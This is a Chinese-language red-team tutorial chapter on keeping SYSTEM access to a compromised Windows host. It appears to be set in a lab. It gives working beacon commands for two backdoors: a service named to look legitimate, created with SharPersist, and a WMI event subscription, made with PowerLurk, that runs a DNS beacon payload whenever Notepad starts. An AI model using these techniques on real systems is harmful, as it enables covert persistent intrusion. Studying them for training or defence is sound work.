本章主要介绍获得SYSTEM权限后的持久化技术,主要是Windows服务和WMI事件订阅
1-概述
在之前章节“主机持久化”中,主要说明如何在用户环境中获取持久化。但是,在提升主机上的权限后,我们还可以添加持久性机制来维护 SYSTEM 访问权限。这样就可以保持对计算机的提升访问权限,而无需再次利用漏洞(因为漏洞可能会在以后被修补或修复),条件是必须在高完整性的 Beacon 中操作
注意:实验环境中有代理设置,SYSTEM 进程无法向 Web 代理进行身份验证,因此不能使用 HTTP Beacons,需要改用 P2P 或 DNS Beacons
2-Windows服务
正如我们在之前章节看到的,有许多 Windows 服务以 SYSTEM 身份运行。我们利用服务进行权限提升的各种手段也可以起到持久化的作用,但代价是破坏合法服务。相反,我们可以创建自己的服务,而不会影响现有的服务
beacon> cd C:Windowsbeacon> upload C:Payloadstcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe legit-svc.exe
beacon> execute-assembly C:ToolsSharPersistSharPersistbinReleaseSharPersist.exe -t service -c "C:Windowslegit-svc.exe" -n "legit-svc" -m add
[*] INFO: Adding service persistence
[*] INFO: Command: C:Windowslegit-svc.exe
[*] INFO: Command Args:
[*] INFO: Service Name: legit-svc
[+] SUCCESS: Service persistence added这将创建一个处于 STOPPED 状态的新服务,但 START_TYPE 设置为 AUTO_START。这意味着服务在计算机重新启动之前不会运行。当计算机启动时,服务也会启动,并且它将等待连接
3-WMI 事件订阅
通过利用以下三种方式,可以实现 WMI 事件实现的持久化:
EventConsumer(事件消费者)
EventFilter(事件过滤器)
FilterToConsumerBinding(过滤器到消费者绑定)
EventConsumer 是想要执行的操作,也就是执行有效负载,可以通过 OS 命令(例如 PowerShell一句话)或 VBScript 来实现
EventFilter 是可以采取行动的触发器,任何任意 WMI 查询都可以用作过滤器,它提供几乎无限的选项。这些选项可以包括特定进程启动时、用户登录时、插入 USB 设备时、一天中的任何特定时间或时间间隔
FilterToConsumerBinding 是将 EventConsumer 和 EventFilter 链接在一起
PowerLurk(https://github.com/Sw4mpf0x/PowerLurk)是一个用于构建这些 WMI 事件的 PowerShell 工具
首先将 DNS 有效负载上传到 Windows 目录,导入 PowerLurk.ps1 并创建一个新的 WMI 事件订阅,该订阅将在启动记事本时执行。
beacon> cd C:Windowsbeacon> upload C:Payloadsdns_x64.exe
beacon> powershell-import C:ToolsPowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:Windowsdns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe之后可以使用Get-WmiEvent -Name WmiBackdoor查看这些订阅
EventConsumer的CommandLineTemplate为C:Windowsdns_x64.exe
EventFilter 的查询语句是SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'
在Workstation 2上打开记事本,DNS Beacon 将会上线
可以使用Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject命令来删除后门
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...